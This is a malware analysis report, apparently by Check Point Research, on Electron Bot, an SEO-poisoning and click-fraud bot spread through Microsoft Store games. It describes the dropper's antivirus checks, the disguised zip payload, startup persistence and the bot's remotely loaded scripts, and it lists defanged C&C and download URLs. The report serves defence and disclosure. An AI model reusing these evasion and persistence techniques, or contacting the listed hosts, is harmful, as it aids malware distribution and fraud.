Check Point Research (CPR) has spotted new malware that is actively being distributed through Microsoft’s official store. With over 5,000 machines already affected, the malware continually executes attacker commands,
such as controlling social media accounts on Facebook, Google and Sound Cloud. The malware can register new accounts, log in, comment on and “like” other posts.
CPR has reported to Microsoft all detected game publishers that are related to this campaign.
Research by: Moshe Marelus
CPR researchers detected a new malware, dubbed Electron Bot, which has infected over 5,000 active machines worldwide. CPR chose the name based on the last campaign’s C&C domain Electron-Bot[.]s3[.]eu-central-1[.]amazonaws.com.
Electron Bot is a modular SEO poisoning malware, which is used for social media promotion and click fraud. It is mainly distributed via the Microsoft store platform and dropped from dozens of infected applications, mostly games, which are constantly uploaded by the attackers.
Figure 1: VirusTotal score
The attackers’ activity began as an ad clicker campaign discovered at the end of 2018. The malware in question was hiding in the Microsoft store as an app called “Album by Google Photos” which claimed to be published by Google LLC.
The malware has constantly evolved through the years as attackers add new features and techniques to its arsenal.
To avoid detection, most of the scripts controlling the malware are loaded dynamically at run time from the attackers’ servers. This enables the attackers to modify the malware’s payload and change the bots’ behavior at any given time.
Electron bot’s main capabilities are:
In addition, the malware’s payload contains functions that control social media accounts on Facebook, Google and Sound Cloud. It can register new accounts, log in, and comment on and “like” other posts.
The malware uses the Electron framework to imitate human browsing behavior and evade website protections.
Figure 2: The infection chain
The infection chain is similar to most campaigns, starting with the installation of an infected application downloaded from the Microsoft Store.
The campaign begins when a user downloads one of the infected applications from the legitimate Microsoft store. To demonstrate, CPR used the game “Temple Endless Runner 2”, which was published on September 6, 2021 and has close to one hundred reviews.
Figure 3: Temple Endless Runner 2
When the game is downloaded, the application package file (APPX) is installed in the following directory: “C:\program files\windowsapps\16925JeuxjeuxjeuxGames.TempleRun2TakeTheIdolIfYouD_188.8.131.52_x64__66k318ytnjhfe \app”
Figure 4: The game folder
The game is built with Electron so most of the files in the folder are associated with the Electron framework. The executable file “app.exe” is the main part of the framework and is responsible for rendering all the scripts that are located in the resource folder.
The resource folder houses an ASAR file named “app.asar”, formatted as an archive and used to package source code for an Electron application. The source code will be unpacked only during runtime.
In this analysis, researchers used the “ASAR 7zip extension” to extract the source code from the “app.asar” file.
Figure 5: The source code folder
The game is loaded by launching the main script “main.js” which is responsible for basic window initialization and downloading a configuration file from hxxps://s3[.]eu-west-1[.]amazonaws[.]com/jeuxjeuxjeux.files/json-obj-el12/templeendlessrunner2.json.
Figure 6: templeendlessrunner2.json
The configuration file includes links to external scripts needed to run the game.
Here is a summary of the main keys:
After all scripts are launched, users can play the game.
The Dropper – “serviceScript”:
The dropper begins by verifying that the infected machine does not have an antivirus product. It does so by checking against a list of hardcoded antivirus products and if an antivirus is detected, the script stops executing.
Figure 7: Anti-virus detection
Next, the dropper downloads “112942.png” from hxxps://mediafire.com/ file/3v4vlgsi1ve53ya/112942.png. This file is a zip folder with a PNG extension. This mismatch between the file format and the file extension is probably because the malware uses a less suspicious file extension to avoid detection. The zipped content is extracted to the following directory: “C:\users\<username>\appdata\local\packages\microsoft.windows.securityupdate_cw5n1h2txyewy”
Figure 8: The bot folder
The dropped folder structure is similar to the game package first downloaded from the Microsoft Store. It is also an Electron app and the source code is loaded dynamically from an external domain.
In the dropped resource folder, there is a file named “app” without a file extension. Like the infected app, the dropper renames the file to “app.asar” so it will be recognized by Electron as the packed source code file in ASAR format. This was likely initiated so the malware doesn’t run unless it is installed properly by the dropper.
Finally, the dropper creates a shortcut file (lnk) for the “Windows Security Update.exe” located in the dropped folder. It places it in the startup folder to gain persistence.
After it’s installed and gained persistence, the bot automatically starts at the next system startup.
The Bot – “Windows Security Update.exe”:
Figure 9: windowsdef.js
“Windowsdef.js” downloads the “main.js”, the actual script that contains all the malware capabilities. This script is hosted on the C&C server under Electron Bot[.]s3[.]eu-central-1[.]amazonaws.com\js\main.js.
The bot is designed to imitate the following user behavior:
Figure 10: “Human” mouse moving function
After getting its dynamic payload, the malware downloads a configuration file from 11k[.]online/textFileProm.json.
Figure 11: The configuration file
In each configuration file, certain commands have a defined ‘countries’ list. The specific commands can only be executed if the infected machine’s GEO location is present in the provided list.
Figure 12: Command types
Figure 13:The bot’s hardcoded YouTube comments
Figure 14: MITRE ATT&CK used techniques
Figure 15: mediafire[.]com showing the upload came from Bulgaria
Figure 16: Bulgaria is the main promoted country
Conclusion and Safety Tips:
Although the bot currently does not engage in high risk activities on the infected machine, it is important to be aware of its capabilities.
This research analyzed a new malware called Electron Bot that has attacked more than 5,000 victims globally. Electron Bot infects machines when downloading certain apps from the official Microsoft store platform. The Electron framework provides Electron apps with access to all of the computer resources, including GPU computing. As the bot’s payload is loaded dynamically at every run time, the attackers can modify the code and change the bots behavior to high risk. For example, they can initialize another second stage and drop a new malware such as ransomware or a RAT. All of this can happen without the victim’s knowledge.
Given most people think that you can trust application store reviews, they do not hesitate to download an application from there. However, CPR researchers warn that there is incredible risk with that and all users should follow a few safety tips when downloading applications:
In order to clean already infected machines, CPR advises users to follow these steps:
Check Point protections:
The Electron Bot campaign, was first detected by our XDR product. The detection was based on a combination of suspicious network activity of a periodic bot and endpoint malware behavior.
Crazy 4 games
Malware hosting sites: